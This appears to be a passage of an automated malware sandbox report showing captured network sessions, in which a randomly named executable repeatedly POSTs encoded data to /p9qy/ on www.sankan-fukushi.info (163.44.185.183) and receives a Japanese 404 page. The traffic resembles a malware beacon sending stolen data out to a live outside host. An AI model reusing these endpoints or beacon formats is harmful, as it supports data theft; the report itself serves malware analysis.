                                                                                  Data Ascii: 8c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.153 0 .302-.044.43-.128l10.472-6.891 3.85-2.511 3.91
                                                                                  Nov 13, 2024 15:37:09.847593069 CET1236INData Raw: 6d 2d 31 39 2e 34 32 36 2d 31 33 2e 31 35 36 6c 2d 2e 33 33 34 2d 2e 38 35 34 20 33 2e 37 35 36 2d 31 2e 38 35 32 20 34 2e 39 30 36 2d 32 2e 33 39 31 2e 35 33 37 2e 36 35 33 20 31 2e 34 35 35 20 31 2e 34 2e 35 35 39 2e 35 34 37 20 37 2e 34 31 37
                                                                                  Data Ascii: m-19.426-13.156l-.334-.854 3.756-1.852 4.906-2.391.537.653 1.455 1.4.559.547 7.417 7.187-3.289 2.16-9.882 6.458-5.125-13.308zm24.211 6.956l-3.376-2.242 10.084-9.6.681.234.254.12 7.7 3.854-.443 1-5.185 13.111-9.715-6.477zm7.749 35.878c.152.157.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.550028163.44.185.183803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:11.509933949 CET741OUTPOST /p9qy/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/p9qy/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 68 78 6d 48 7a 72 38 2b 4b 65 6b 39 42 5a 6b 32 55 37 37 55 2b 70 77 2b 6d 33 47 6b 5a 4b 38 76 44 4e 62 59 43 41 41 5a 43 71 57 43 76 50 55 54 45 61 6a 2f 71 6a 6c 7a 4f 53 50 34 62 46 31 62 46 33 45 32 43 39 7a 45 39 37 75 50 78 43 63 70 7a 75 71 70 35 67 46 31 45 6a 6c 49 36 6c 64 52 48 41 6a 62 45 47 58 42 45 78 35 35 35 38 35 49 63 72 78 4a 76 76 64 4c 52 51 69 4a 32 32 4e 67 33 6e 52 45 37 59 38 61 58 75 61 43 4f 43 44 47 38 69 37 48 4a 51 68 32 70 4e 33 46 37 66 46 65 57 75 4a 5a 79 37 67 32 4d 46 47 56 66 6f 2f 6d 47 47 4d 31 61 73 32 68 54 32 76 4a 51 45 45 49 34 55 77 56 31 4f 65 63 2b 49 54 43 42 71 7a 63 50 78 4c 72 61 69 4a 38 41 63 54 72
                                                                                  Data Ascii: 2J=hxmHzr8+Kek9BZk2U77U+pw+m3GkZK8vDNbYCAAZCqWCvPUTEaj/qjlzOSP4bF1bF3E2C9zE97uPxCcpzuqp5gF1EjlI6ldRHAjbEGXBEx55585IcrxJvvdLRQiJ22Ng3nRE7Y8aXuaCOCDG8i7HJQh2pN3F7fFeWuJZy7g2MFGVfo/mGGM1as2hT2vJQEEI4UwV1Oec+ITCBqzcPxLraiJ8AcTr
                                                                                  Nov 13, 2024 15:37:12.388792992 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 13, 2024 15:37:12.388915062 CET1236INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                                                  Nov 13, 2024 15:37:12.388927937 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                                                  Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                                                  Nov 13, 2024 15:37:12.389436007 CET1236INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b
                                                                                  Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
                                                                                  Nov 13, 2024 15:37:12.389448881 CET1236INData Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                                                  Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
                                                                                  Nov 13, 2024 15:37:12.389460087 CET1236INData Raw: 2e 31 36 31 20 30 2d 31 2e 39 20 30 2d 33 2e 38 35 33 2d 2e 35 38 34 2d 34 2e 34 32 35 2d 2e 34 34 37 2d 2e 32 38 2d 2e 39 37 38 2d 2e 33 39 32 2d 31 2e 35 2d 2e 33 31 36 6c 2e 30 30 32 2d 2e 30 30 32 7a 6d 35 37 2e 33 2e 32 34 31 63 2d 2e 34 38
                                                                                  Data Ascii: .161 0-1.9 0-3.853-.584-4.425-.447-.28-.978-.392-1.5-.316l.002-.002zm57.3.241c-.488-.051-.979.066-1.392.331-.6.557-.614 2.528-.629 4.425 0 .993 0 2.062-.09 3.161-.037 1.055-.147 2.106-.329 3.146-.239 1.881-.479 3.823 0 4.515.514.396 1.153.594
                                                                                  Nov 13, 2024 15:37:12.390438080 CET1236INData Raw: 33 34 20 30 20 32 30 2e 34 38 36 2d 38 2e 30 33 37 20 32 35 2e 30 35 31 2d 31 39 2e 34 31 35 2e 38 38 31 2e 34 32 32 20 31 2e 38 33 37 2e 36 36 32 20 32 2e 38 31 33 2e 37 30 37 68 2e 37 33 33 63 32 2e 35 37 36 2e 31 34 32 20 35 2e 30 30 36 2d 31
                                                                                  Data Ascii: 34 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201 6.255-3.458 1.144-2.399 1.746-5.019 1.766-7.676.265-2.556-.016-5.139-.823-7.578zm-62.16 14.494c-.516.39-1.154.583-1.8.542-1.444.307-2.918-.373-3.621-1.671-.
                                                                                  Nov 13, 2024 15:37:12.390451908 CET1236INData Raw: 33 30 2e 33 35 37 20 32 34 2e 30 36 33 20 33 30 2e 34 68 2e 31 35 63 31 33 2e 30 37 39 20 30 20 32 34 2e 31 38 33 2d 31 33 2e 38 20 32 34 2e 32 34 32 2d 33 30 2e 31 39 31 2e 30 31 33 2d 34 2e 33 38 37 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35
                                                                                  Data Ascii: 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-
                                                                                  Nov 13, 2024 15:37:12.390464067 CET1236INData Raw: 36 31 32 2e 31 31 39 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 42 45 39 22 20 64 3d 22 4d 35 32 2e 32 39 20 35 38 2e 39 30 38 6c 2d 32 2e 33 31 39 2d 32 2e 39 32 73 32 2e 33 39 34 2d 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32
                                                                                  Data Ascii: 612.119z"/><path fill="#FFEBE9" d="M52.29 58.908l-2.319-2.92s2.394-4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.48
                                                                                  Nov 13, 2024 15:37:12.390475035 CET479INData Raw: 20 32 2e 35 33 38 2d 32 2e 30 39 34 20 35 2e 30 30 31 2d 33 2e 34 31 37 20 37 2e 33 36 37 6c 2d 2e 34 2e 36 38 31 2d 2e 37 33 20 31 2e 31 37 38 63 2d 2e 33 36 31 2e 36 2d 2e 37 33 39 20 31 2e 31 35 33 2d 31 2e 30 39 33 20 31 2e 36 35 37 6c 2d 2e
                                                                                  Data Ascii: 2.538-2.094 5.001-3.417 7.367l-.4.681-.73 1.178c-.361.6-.739 1.153-1.093 1.657l-.208.3c-.379.523-.731 1-1.084 1.448l-.447.542c-.335.411-.674.784-1 1.142-.74.789-1.536 1.524-2.381 2.2l-.273.218-9.572-.005zm5-10.2c-.405-.001-.801.124-1.133.356-
                                                                                  Nov 13, 2024 15:37:12.395509958 CET1236INData Raw: 36 2d 2e 36 38 33 2e 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 32 31 36 2e 38 39 32 20 31 2e 30 31 35 20 31 2e 35 32 20 31 2e 39 33 33 20 31 2e 35 32 2e 39 31 38 20 30 20 31 2e 37 31 37 2d 2e 36 32 38 20 31 2e 39
                                                                                  Data Ascii: 6-.683.482-1.001 1.333-.8 2.145.216.892 1.015 1.52 1.933 1.52.918 0 1.717-.628 1.933-1.52.201-.812-.117-1.663-.8-2.145-.332-.231-.727-.354-1.132-.353l-.001-.003zm0-9.427c-.742.001-1.422.415-1.763 1.074-.433.825-.244 1.839.456 2.453.692.608 1.7


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.550029163.44.185.183803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:14.055740118 CET1758OUTPOST /p9qy/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/p9qy/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 68 78 6d 48 7a 72 38 2b 4b 65 6b 39 42 5a 6b 32 55 37 37 55 2b 70 77 2b 6d 33 47 6b 5a 4b 38 76 44 4e 62 59 43 41 41 5a 43 71 4f 43 6f 35 49 54 46 37 6a 2f 72 6a 6c 7a 51 69 50 39 62 46 31 61 46 33 64 2f 43 39 50 55 39 35 57 50 67 55 67 70 37 37 57 70 79 67 46 31 62 7a 6c 4e 31 46 63 62 48 41 7a 66 45 48 37 42 45 78 35 35 35 39 4a 49 4e 36 78 4a 70 76 64 45 57 51 69 46 67 47 4e 59 33 6e 59 7a 37 62 51 67 58 2b 36 43 4e 69 54 47 2f 51 44 48 42 51 68 6a 36 39 33 64 37 66 4a 37 57 6f 73 6f 79 37 56 64 4d 47 57 56 4f 2b 53 62 56 45 49 52 47 76 4b 52 55 78 2f 4b 45 51 34 45 2f 45 49 45 34 63 47 6d 79 36 54 4e 57 74 2f 6d 61 51 43 2f 62 6d 6c 55 49 70 2b 5a 41 47 68 70 49 36 5a 49 31 65 79 62 57 37 56 4b 46 34 54 4d 36 43 33 46 44 51 39 58 43 61 46 52 43 43 74 42 4e 77 36 4f 72 4c 54 6f 4a 48 41 37 2f 73 72 6a 69 53 69 4c 51 66 41 6d 6d 64 68 59 62 69 58 48 67 33 68 6d 48 47 5a 2b 4b 63 46 4c 57 4c 78 6b 2f 4d 2f 6f 53 50 38 56 33 50 6d 6c 36 47 4d 4f 77 4c 43 4f 75 2f 38 48 51 38 6f 7a 52 76 33 [TRUNCATED]
                                                                                  Data Ascii: 2J=hxmHzr8+Kek9BZk2U77U+pw+m3GkZK8vDNbYCAAZCqOCo5ITF7j/rjlzQiP9bF1aF3d/C9PU95WPgUgp77WpygF1bzlN1FcbHAzfEH7BEx5559JIN6xJpvdEWQiFgGNY3nYz7bQgX+6CNiTG/QDHBQhj693d7fJ7Wosoy7VdMGWVO+SbVEIRGvKRUx/KEQ4E/EIE4cGmy6TNWt/maQC/bmlUIp+ZAGhpI6ZI1eybW7VKF4TM6C3FDQ9XCaFRCCtBNw6OrLToJHA7/srjiSiLQfAmmdhYbiXHg3hmHGZ+KcFLWLxk/M/oSP8V3Pml6GMOwLCOu/8HQ8ozRv3kMCkWX7noa04RLNr9x2CqJhNFWMmHRneok8cy5hKB+wZc94PHfB5KHoHw0T06YqRbQknt38POE8Bv0sYGD0qiVof5Hz4vzmrrHVwI/XPUtT7wownVDHeuytI/B1cxS4IS8rT/kPHvHOo1NC7D8k/ZiY4o/IGZhcnQPG3vg+rPxyXRN7QlEAljjQ1k3S/YBAKurDZMuJcLlFSl8MrfA1XKIr0XdJnzxb+AJUr6OoGkFlx4UTFKWWvQRCGwB/HndDiubduOMghQmPExGx1bm7f7n3s5BMiA43aEjwakNNqrx6+4jDtHg5arPWNEl2FSg14I0z0YGNXseiadjDGJHUewZNtd/YXyZE2Li2KpmcQpPRuchcDKV3v1+ARaUV5+qMGUg2m4jZWMLyoaMRIZNoooMtZc6h/o4WIJn+vccvnNLtdSEvZdNV4knOBZFEsrZf12DVN0efTNy4yJU+LX7bOE2Ay2jGIWqnRLiUp+Pa5z55G05ZnKNOSzU/jwZUfYZLxiP7XGNLnOsI2293h8cIXDuhYusQ4izRTRMgp8IszccakTqyLpqfSA19pwWY/DlkuWap8n8B2mi4oLfHAzr3/CXayYiNWCl9PRzkEHCGS+hVdA6LT2EA3Qrl3mXkeFMpKLjtrTWCjhwTIyJ4qwwUJEOTMiZueV35PJi [TRUNCATED]
                                                                                  Nov 13, 2024 15:37:14.922352076 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:14 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 13, 2024 15:37:14.922416925 CET212INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: c
                                                                                  Nov 13, 2024 15:37:14.922450066 CET1236INData Raw: 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20
                                                                                  Data Ascii: enter; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap
                                                                                  Nov 13, 2024 15:37:14.922668934 CET1236INData Raw: 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20
                                                                                  Data Ascii: rtical-align: middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute;
                                                                                  Nov 13, 2024 15:37:14.922703981 CET443INData Raw: 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20
                                                                                  Data Ascii: dth: 100%; } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; }
                                                                                  Nov 13, 2024 15:37:14.923106909 CET1236INData Raw: 61 6c 2d 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30
                                                                                  Data Ascii: al-right { margin-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javascript"> /
                                                                                  Nov 13, 2024 15:37:14.923135042 CET212INData Raw: 2e 31 2d 32 2e 38 34 35 20 33 33 2e 30 35 36 2d 38 2e 39 34 20 34 2e 39 35 36 2d 36 2e 30 39 35 20 33 2e 33 34 33 2d 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32 37 31 2d 33 38 2e 33 33 34 63 35 2e 31 39 33 2d 36
                                                                                  Data Ascii: .1-2.845 33.056-8.94 4.956-6.095 3.343-14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.3
                                                                                  Nov 13, 2024 15:37:14.923167944 CET1236INData Raw: 35 36 2d 33 31 2e 37 37 34 2d 32 31 2e 34 33 31 2d 31 31 2e 32 35 33 20 30 2d 31 39 2e 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37 36 36 20 36 2e 38 33 39 2d 35 2e 39 38 36 20 31 30
                                                                                  Data Ascii: 56-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238 6.114.696 1.315 2
                                                                                  Nov 13, 2024 15:37:14.923202991 CET1236INData Raw: 30 32 2d 32 2e 34 30 39 2d 37 2e 33 36 2d 2e 33 30 34 2d 2e 36 37 2d 2e 39 38 36 2d 31 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35 36 37 2d 33 33 2e 37 31 35 2d 31 30 2e 33 32 35 2d
                                                                                  Data Ascii: 02-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.581 5.283 1.706 7
                                                                                  Nov 13, 2024 15:37:14.924058914 CET1236INData Raw: 2d 32 36 2e 34 34 33 63 2d 2e 30 31 31 20 32 2e 30 39 38 2d 2e 34 34 39 20 34 2e 31 37 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36 2d 33 2e 36 33 36 20 31 2e 36 34 31 2d 2e 36 34 37
                                                                                  Data Ascii: -26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2.856.731 3.4 2.10
                                                                                  Nov 13, 2024 15:37:14.928677082 CET1236INData Raw: 31 20 31 2e 30 37 32 2d 31 2e 36 30 32 20 31 2e 30 39 35 6c 2d 2e 30 31 33 2e 30 36 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e 39 37 33 6c 2d 34 2e 31 31 35 20 31 2e 34 36 2d 34 2e 31
                                                                                  Data Ascii: 1 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.285-1.103l3.5 1.279


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.550030163.44.185.183803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:16.723383904 CET448OUTGET /p9qy/?2J=szOnwbI0B7M9cMMwX4bDwuNgoUWUV7slIpLLNm8Tfpa5tKMeNeGfvlEASyf1bFN7LlEkU7ntq56NwT9FzvKbuwV8GB1U7lwGbSSnMTrnLCsmtu5+GLJZif51cB3zkwMvhA==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:37:17.605088949 CET192INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:17 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Nov 13, 2024 15:37:17.605226040 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d
